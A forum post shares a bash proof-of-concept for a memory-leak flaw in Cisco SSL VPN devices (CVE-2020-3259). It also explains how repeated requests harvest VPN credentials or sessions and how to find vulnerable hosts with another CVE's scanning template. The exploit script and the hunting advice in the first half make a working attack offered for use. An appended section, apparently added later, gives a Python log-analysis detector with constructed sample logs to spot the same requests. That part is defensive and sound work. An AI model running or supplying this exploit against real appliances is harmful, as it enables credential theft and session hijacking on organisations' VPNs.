Hey Community!
Didn't see any posts about this PoC, so I figured I'd share since it's still kicking around in 2024: Link
POC: POC Link
Cisco-CVE-2020-3259.sh
Bash:
#!/bin/bash
# Request path from the posted PoC: an oversized "token" value followed by a
# trailing test=%p parameter. Kept exactly as posted.
ARGSTR='+CSCOE+/sdesktop/webstart.xml?tokeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeen=!@#$%^&%^&%^&%^&%^&%^&%^&%^%^&%^&%^&%^&%^%^&%^&%^&%^&test=%p'
# Quoted so the "?" in the path is never treated as a shell glob
echo "$ARGSTR"
# 1.2.3.4 is a placeholder for the target host; -k skips certificate checks and
# --trace-ascii writes the complete request/response exchange to output.txt
curl -k "https://1.2.3.4/$ARGSTR" --trace-ascii output.txt
This bad boy's a Heartbleed-style vuln. Every time you fire off a request, you can snag a chunk of memory.
Do it enough times (with a bit of luck) and boom – you've got Cisco SSLVPN creds or login sessions.
Can't find any Nuclei or Nmap templates to scan for this thing, but here's a tip: check out the changelog for the fix. The versions are pretty close to the ones that patched CVE-2020-3580 (not exactly, but close enough).
So, you can hunt for vulnerable devices using the CVE-2020-3580 Nuclei template: Template
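Since the post says there is no Nuclei or Nmap template for this one, here is the log-side check a defender can run instead. This is an added example, not code from the original post, the PoC author, or Cisco. It assumes combined-format access logs (Apache/NGINX style) from the VPN front end or a proxy/WAF in front of it, uses the request path from the PoC script as the indicator, and treats the `token_max` (64) and `repeat_threshold` (3) values as assumed starting points; the `SAMPLE_LOG` lines are constructed test data.

```python
import re
from collections import Counter

# Path requested by the PoC script in the post (curl -k https://<host>/+CSCOE+/sdesktop/webstart.xml?...)
WEBSTART_PATH = "/+CSCOE+/sdesktop/webstart.xml"

# Combined log format. Assumption: the VPN front end, a reverse proxy, or a WAF
# in front of it logs requests in this shape.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_log_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match.

    Query parameters are kept raw (no percent-decoding) because the indicator is
    the raw length of the token value exactly as it was sent.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    params = []
    for kv in (query.split("&") if query else []):
        key, _, value = kv.partition("=")
        params.append((key, value))
    return {
        "src": m.group("src"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": path,
        "params": params,
        "status": int(m.group("status")),
    }


def analyze(log_text, token_max=64, repeat_threshold=3):
    """Return per-request findings plus sources that repeatedly hit the webstart.xml endpoint.

    token_max and repeat_threshold are assumed tuning values for this example;
    measure legitimate token lengths on your own deployment before relying on them.
    """
    findings = []
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None or rec["path"].lower() != WEBSTART_PATH.lower():
            continue
        hits[rec["src"]] += 1
        reasons = []
        token_len = max((len(v) for k, v in rec["params"] if k == "token"), default=0)
        if token_len > token_max:
            reasons.append(f"token length {token_len} exceeds {token_max}")
        if ("test", "%p") in rec["params"]:
            reasons.append("trailing test=%p parameter matches the posted PoC")
        if reasons:
            findings.append({"src": rec["src"], "ts": rec["ts"], "reasons": reasons})
    # The post notes that each request leaks one chunk and the attacker repeats it,
    # so a single source hammering this endpoint is the second signal.
    repeat_sources = {src: n for src, n in hits.items() if n >= repeat_threshold}
    return {"findings": findings, "repeat_sources": repeat_sources}


def _sample_line(src, second, target, size, agent):
    """Build one constructed combined-format log line (test data, not real traffic)."""
    return (f'{src} - - [10/Mar/2024:12:00:{second:02d} +0000] '
            f'"GET {target} HTTP/1.1" 200 {size} "-" "{agent}"')


# Constructed sample: three PoC-shaped requests from 203.0.113.7 (documentation
# address range), then two ordinary requests that must not be flagged.
_POC_TARGET = WEBSTART_PATH + "?token=" + "e" * 500 + "&test=%p"
SAMPLE_LOG = "\n".join([
    _sample_line("203.0.113.7", 1, _POC_TARGET, 1523, "curl/8.4.0"),
    _sample_line("203.0.113.7", 2, _POC_TARGET, 1498, "curl/8.4.0"),
    _sample_line("203.0.113.7", 3, _POC_TARGET, 1511, "curl/8.4.0"),
    _sample_line("198.51.100.4", 4, WEBSTART_PATH + "?token=abc123", 812, "Mozilla/5.0"),
    _sample_line("198.51.100.9", 5, "/+CSCOE+/logon.html", 4096, "Mozilla/5.0"),
])

if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for f in result["findings"]:
        print(f"{f['ts']} {f['src']}: " + "; ".join(f["reasons"]))
    print("repeat sources:", result["repeat_sources"])
```

Run it as-is to see the three flagged requests and the single repeat source; point `analyze` at your own log text to use it for real. Matching on the raw token length rather than the decoded value is deliberate: the PoC pads the token with hundreds of bytes and no normal client does that, so the length is the stable part of the signal even if the padding characters change.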